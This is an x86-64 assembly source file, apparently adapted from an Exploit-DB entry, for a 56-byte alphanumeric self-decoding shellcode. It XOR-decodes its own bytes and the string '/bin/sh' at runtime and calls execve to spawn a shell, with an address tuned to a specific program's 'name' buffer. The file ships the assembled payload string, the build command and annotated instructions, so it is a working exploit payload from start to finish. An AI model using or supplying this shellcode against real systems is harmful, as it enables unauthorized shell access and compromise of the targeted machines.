# Slightly modified from: https://www.exploit-db.com/exploits/35205/ # Assembled (56 bytes): # h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V # # Assembly: # user@host $ as binsh.s -o binsh.o ; strings binsh.o .section .data .section .text .globl _start _start: push $0x2f2f412f pop %rax xor $0x2f4f5150, %rax # RAX becomes 0x60107f. it's close to the buffer of 'name'. use it as the base of shellcode push %rax pop %rsi # Make use of '^', AKA pop %rsi prepare_key: # "hj5XVX" # put the xor key into %eax push $0x5658356a # 'hj5XV' pushed backwards because x86 stack. pop %rax # 'X' decode_encoded_code: # "1FK" #xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded xor %eax, 0x6d(%rsi) # '1FK' encoded_code ; pops & syscall decoded decode_encoded_data: # "1FSH3FO" xor %eax, 0x75(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded xor 0x71(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax begin_stack_setup: # "PT" push %rax # 'P' push "/bin/sh\0" push %rsp # 'T' push pointer to /bin/sh zero_rax: # "j0X40" # xor %rax, %rax push $0x30 # 'j0' pop %rax # 'X' xor $0x30, %al # '40' %rax is NULL end_stack_setup: # "PP" push %rax # 'P' push NULL push %rax # 'P' push NULL mov_3b_al: # "4u4N" # mov $0x3b, %al xor $0x75, %al # '4u' xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b # this is for syscall ^ begin_stack_run: # "Z" pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL encoded_code: # "4jWS" # 0x34 0x6a 0x57 0x53 # AFTER XOR MAGIC: .byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL .byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" .byte 0x57 # "\x0f" .byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL); # syscall(%rax) = function(%rdi,%rsi,%rdx); # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL); encoded_data: # "EW18EF0V" turns into "/bin/sh\0" # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56 # AFTER XOR MAGIC: .byte 0x45 # / .byte 0x57 # b .byte 0x31 # i .byte 0x38 # n .byte 0x45 # / .byte 0x46 # s .byte 0x30 # h .byte 0x56 # \0